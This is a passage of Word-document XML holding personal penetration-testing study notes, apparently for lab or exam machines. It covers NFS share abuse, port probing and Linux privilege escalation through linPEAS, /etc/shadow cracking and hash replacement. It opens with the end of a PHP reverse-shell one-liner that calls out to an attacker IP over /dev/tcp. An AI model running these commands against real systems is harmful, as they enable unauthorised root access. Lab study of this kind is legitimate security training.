          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="3"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>"0&lt;&amp;196;exec 196&lt;&gt;/dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="3"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="3"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">/10.11.0.191/443; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="3"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="3"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;&amp;196 &gt;&amp;196 2&gt;&amp;196"); ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B14FFE" w14:textId="1B2BB557" w:rsidR="00ED0C7A" w:rsidRDefault="00ED0C7A"/>
    <w:p w14:paraId="76D88532" w14:textId="77777777" w:rsidR="00ED0C7A" w:rsidRDefault="00ED0C7A"/>
    <w:p w14:paraId="54C92535" w14:textId="77777777" w:rsidR="00223BCB" w:rsidRDefault="00223BCB"/>
    <w:p w14:paraId="2F093ACC" w14:textId="4C8E53E1" w:rsidR="002E4531" w:rsidRPr="00034E76" w:rsidRDefault="00976BF6" w:rsidP="00755B27">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00034E76">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NFS (2049)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B34C1A6" w14:textId="1415317B" w:rsidR="00976BF6" w:rsidRDefault="00755B27">
      <w:r>
        <w:t>Show mountable shares</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1801BF" w14:textId="02262DD9" w:rsidR="00755B27" w:rsidRDefault="00755B27">
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Showmount</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -e IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB98792" w14:textId="4D341971" w:rsidR="00755B27" w:rsidRDefault="00755B27">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Mount share</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C0E229" w14:textId="7DAEC5E4" w:rsidR="00755B27" w:rsidRDefault="00755B27">
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> mount -t </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nfs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">=2 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>IP:SHARE</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> DIR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34EABBBB" w14:textId="567EF15E" w:rsidR="00755B27" w:rsidRDefault="00755B27">
      <w:r>
        <w:t xml:space="preserve">On victim machine, find a directory that has </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>no_root_squash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>no_all_squash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> set</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFE7DA9" w14:textId="53638447" w:rsidR="00755B27" w:rsidRDefault="00755B27">
      <w:r>
        <w:tab/>
        <w:t>Cat /etc/exports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD67EF9" w14:textId="0E550BCB" w:rsidR="009A4488" w:rsidRDefault="009A4488">
      <w:r>
        <w:t>If so, exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1482A261" w14:textId="7261E611" w:rsidR="00755B27" w:rsidRPr="00034E76" w:rsidRDefault="00755B27" w:rsidP="00755B27">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00034E76">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Strange ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFEE53A" w14:textId="53EC8032" w:rsidR="00755B27" w:rsidRDefault="00755B27">
      <w:r>
        <w:t>Try to connect to see what it is through browser or</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA2243E" w14:textId="77777777" w:rsidR="00755B27" w:rsidRDefault="00755B27">
      <w:r>
        <w:tab/>
        <w:t>Nc -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> IP PORT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134CDC84" w14:textId="5EFB4F03" w:rsidR="00755B27" w:rsidRDefault="00755B27">
      <w:r>
        <w:t>Look to see if other ports are similar (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>e.g</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> mail server and admin for mail port)</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="06768D2D" w14:textId="0D12A3EF" w:rsidR="00FB1B03" w:rsidRDefault="00FB1B03"/>
    <w:p w14:paraId="1F27BE39" w14:textId="058DD0B8" w:rsidR="00FB1B03" w:rsidRPr="00915E3B" w:rsidRDefault="00FB1B03" w:rsidP="00915E3B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00915E3B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PRIVILEGE ESCALATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E42F9EE" w14:textId="7914626A" w:rsidR="00E203BD" w:rsidRPr="00915E3B" w:rsidRDefault="00E203BD" w:rsidP="00915E3B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00915E3B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F0EB19" w14:textId="6F9E70EB" w:rsidR="00E203BD" w:rsidRDefault="00E203BD">
      <w:r>
        <w:t xml:space="preserve">For Linux systems, I would </w:t>
      </w:r>
      <w:r w:rsidR="001A1743">
        <w:t xml:space="preserve">first run </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001A1743">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001A1743">
        <w:t xml:space="preserve"> -l to see if I have access to any </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001A1743">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001A1743">
        <w:t xml:space="preserve"> commands, which would likely be an easy route to escalation. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5EC987" w14:textId="16DC6047" w:rsidR="0094432F" w:rsidRDefault="0094432F">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Also</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> this to see which language exploits will work (check to see if PEAS does this)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6A985F" w14:textId="1B60E784" w:rsidR="0094432F" w:rsidRDefault="0094432F">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="111827"/>
        </w:rPr>
        <w:t xml:space="preserve">which </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="111827"/>
        </w:rPr>
        <w:t>awk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="111827"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="111827"/>
        </w:rPr>
        <w:t>perl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="111827"/>
        </w:rPr>
        <w:t xml:space="preserve"> python ruby </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="111827"/>
        </w:rPr>
        <w:t>gcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="111827"/>
        </w:rPr>
        <w:t xml:space="preserve"> cc vi vim </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="111827"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="111827"/>
        </w:rPr>
        <w:t xml:space="preserve"> find </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="111827"/>
        </w:rPr>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="111827"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="111827"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="111827"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="111827"/>
        </w:rPr>
        <w:t>wget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="111827"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="111827"/>
        </w:rPr>
        <w:t>tftp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="111827"/>
        </w:rPr>
        <w:t xml:space="preserve"> ftp 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E9AED0" w14:textId="48248D4B" w:rsidR="0068185A" w:rsidRDefault="0068185A">
      <w:r>
        <w:t xml:space="preserve">Then, run </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linPEAS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007C5EC6">
        <w:t xml:space="preserve"> (-a option if have time)</w:t>
      </w:r>
      <w:r w:rsidR="00034E76">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006535B2">
        <w:t>Lse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006535B2">
        <w:t xml:space="preserve"> as backup.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562CCC53" w14:textId="551A0574" w:rsidR="006535B2" w:rsidRDefault="006535B2">
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> +x linpeas.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62502478" w14:textId="1944762A" w:rsidR="006535B2" w:rsidRDefault="006535B2">
      <w:r>
        <w:tab/>
        <w:t>./linpeas.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054E01C7" w14:textId="72FDAD5F" w:rsidR="006535B2" w:rsidRDefault="00034E76">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidR="003878B2" w:rsidRPr="00564FBC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cstheme="minorHAnsi"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>https://gtfobins.github.io/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="439007AE" w14:textId="39E645BF" w:rsidR="006535B2" w:rsidRPr="006535B2" w:rsidRDefault="006535B2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006535B2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Kernel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1FCDE3" w14:textId="29F397A3" w:rsidR="006535B2" w:rsidRDefault="006535B2" w:rsidP="006535B2">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linPEAS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> should tell us the kernel version (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -a can too) and suggest exploits. Use these or google/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>exploitdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> for others. Run but may need to revert and try something else if it fails.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="742CCF54" w14:textId="52B90D0E" w:rsidR="006535B2" w:rsidRPr="00E37457" w:rsidRDefault="00E37457">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E37457">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Service</w:t>
      </w:r>
      <w:r w:rsidR="00191B6C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (processes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D26A4AC" w14:textId="1E559A6D" w:rsidR="006535B2" w:rsidRPr="002F38F6" w:rsidRDefault="002F38F6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F38F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Services running as root</w:t>
      </w:r>
      <w:r w:rsidR="00CB2C86">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00191B6C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>also</w:t>
      </w:r>
      <w:r w:rsidR="00CB2C86">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> software information for more info)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60901DBC" w14:textId="6841EAE1" w:rsidR="006535B2" w:rsidRDefault="002F38F6">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linPEAS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> will identify all processes running as root. If any look interesting (such as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">), we can try to find the version number to look for a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>priv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> esc exploit. Can also access the service to see what there is.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DCA1F7" w14:textId="459B9186" w:rsidR="00CB2C86" w:rsidRDefault="00CB2C86">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65C08B6E" wp14:editId="6A6F2998">
            <wp:extent cx="5731510" cy="128333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7F751" w14:textId="7A17B112" w:rsidR="00230716" w:rsidRDefault="00CB2C86">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65BF8B83" wp14:editId="66002986">
            <wp:extent cx="5731510" cy="95821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D5441" w14:textId="378B522D" w:rsidR="006535B2" w:rsidRPr="002F38F6" w:rsidRDefault="002F38F6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F38F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Port forwarding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D20703" w14:textId="01316B16" w:rsidR="006535B2" w:rsidRDefault="002F38F6">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>winPEAS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> will identify services running on localhost. If they are not accessible internally (because requires a browser, for example) can port forward to my machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F04A054" w14:textId="2A527D7E" w:rsidR="006535B2" w:rsidRDefault="002F38F6" w:rsidP="002F38F6">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -R &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>myport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;:127.0.1:&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>serviceport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt; &lt;username&gt;@&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mymachine</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2343107C" w14:textId="23A7B349" w:rsidR="006535B2" w:rsidRDefault="002F38F6">
      <w:r>
        <w:t>Then access it through localhost:&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>myport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF0FF1D" w14:textId="702D4A26" w:rsidR="002F38F6" w:rsidRPr="00E37457" w:rsidRDefault="002F38F6" w:rsidP="002F38F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Weak files permissions</w:t>
      </w:r>
      <w:r w:rsidR="00CB2C86">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (interesting files)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1477BD1A" w14:textId="1F8BC271" w:rsidR="002F38F6" w:rsidRPr="002F38F6" w:rsidRDefault="00CB2C86" w:rsidP="002F38F6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Readable /etc/shadow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4009B74C" w14:textId="60DA18FB" w:rsidR="006535B2" w:rsidRDefault="00CB2C86" w:rsidP="002F38F6">
      <w:r>
        <w:t xml:space="preserve">Take password hash (between first and second colons) and crack it on kali. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FD44D4" w14:textId="71FB5E1B" w:rsidR="00CB2C86" w:rsidRDefault="00CB2C86" w:rsidP="002F38F6">
      <w:r>
        <w:t xml:space="preserve">Then use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>su</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to change to root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2900BA7F" w14:textId="4399398F" w:rsidR="00CB2C86" w:rsidRPr="002F38F6" w:rsidRDefault="00CB2C86" w:rsidP="00CB2C86">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Writable /etc/shadow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535618C2" w14:textId="01B504EB" w:rsidR="00CB2C86" w:rsidRDefault="009E142B" w:rsidP="00CB2C86">
      <w:r>
        <w:t>On kali, generate new hash with new password (usually sha 512 but check if machine older)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188A5F26" w14:textId="30352783" w:rsidR="009E142B" w:rsidRDefault="009E142B" w:rsidP="00CB2C86">
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Mkpasswd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -m sha-512 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>newpassword</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="52F6E815" w14:textId="487D3510" w:rsidR="009E142B" w:rsidRDefault="009E142B" w:rsidP="00CB2C86">
      <w:r>
        <w:t>Copy entire hash and use it to replace the root user’s hash in /etc/shadow/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066987A0" w14:textId="6D3B1D5E" w:rsidR="009E142B" w:rsidRDefault="009E142B" w:rsidP="00CB2C86">
      <w:r>
        <w:t xml:space="preserve">Then use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>su</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to change to root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE27F96" w14:textId="0C55B729" w:rsidR="009E142B" w:rsidRPr="009E142B" w:rsidRDefault="009E142B" w:rsidP="00CB2C86">
